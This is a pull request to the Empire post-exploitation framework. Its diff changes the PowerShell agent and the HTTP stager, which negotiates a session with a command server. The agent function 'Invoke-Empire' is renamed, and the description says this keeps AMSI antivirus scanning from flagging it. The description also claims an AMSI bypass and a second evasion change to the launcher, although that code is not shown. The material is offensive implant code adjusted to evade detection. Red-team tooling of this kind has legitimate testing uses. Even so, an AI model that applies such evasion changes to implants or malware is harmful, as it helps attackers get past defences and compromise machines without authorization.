### PR TITLE
Fixed so the agent should work on Windows 10 Pro Build 17134

### DIFF
--- a/data/agent/agent.ps1
+++ b/data/agent/agent.ps1
@@ -1,5 +1,5 @@
 
-function Invoke-Empire {
+function Invoke-Agent {
     <#
         .SYNOPSIS
         The main functionality of the Empire agent.
@@ -441,6 +441,8 @@ function Invoke-Empire {
         param($JobName)
         if($Script:Jobs.ContainsKey($JobName)) {
             $Script:Jobs[$JobName]['Buffer'].ReadAll()
+            $Script:Jobs[$JobName]['PSHost'].Streams.Error
+            $Script:Jobs[$JobName]['PSHost'].Streams.Error.Clear()
         }
     }
 
@@ -453,6 +455,8 @@ function Invoke-Empire {
             $Null = $Script:Jobs[$JobName]['PSHost'].Stop()
             # get results
             $Script:Jobs[$JobName]['Buffer'].ReadAll()
+            $Script:Jobs[$JobName]['PSHost'].Streams.Error
+            $Script:Jobs[$JobName]['PSHost'].Streams.Error.Clear()
             # unload the app domain runner
             $Null = [AppDomain]::Unload($Script:Jobs[$JobName]['AppDomain'])
             $Script:Jobs.Remove($JobName)

--- a/data/agent/stagers/http.ps1
+++ b/data/agent/stagers/http.ps1
@@ -236,7 +236,7 @@ function Start-Negotiate {
     [GC]::Collect();
 
     # TODO: remove this shitty $server logic
-    Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;
+    Invoke-Agent -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;
 }
 # $ser is the server populated from the launcher code, needed here in order to facilitate hop listeners
 Start-Negotiate -s "$ser" -SK 'REPLACE_STAGING_KEY' -UA $u;


### PR DESCRIPTION
The changes should make the Empire agent to work again on Windows 10.

Tested on

Windows 10 Pro Build 17134
Windows 10 Home Build 17763

The change includes the following,

AMSI bypass, by Rasta Mouse (https://rastamouse.me)
HTTPS fix by https://github.com/zinzloun
Changed the stager and the agent so AMSI not trigger on "Invoke-Empire"
Changed the launcher so AMSI not trigger on "amsiInitFailed".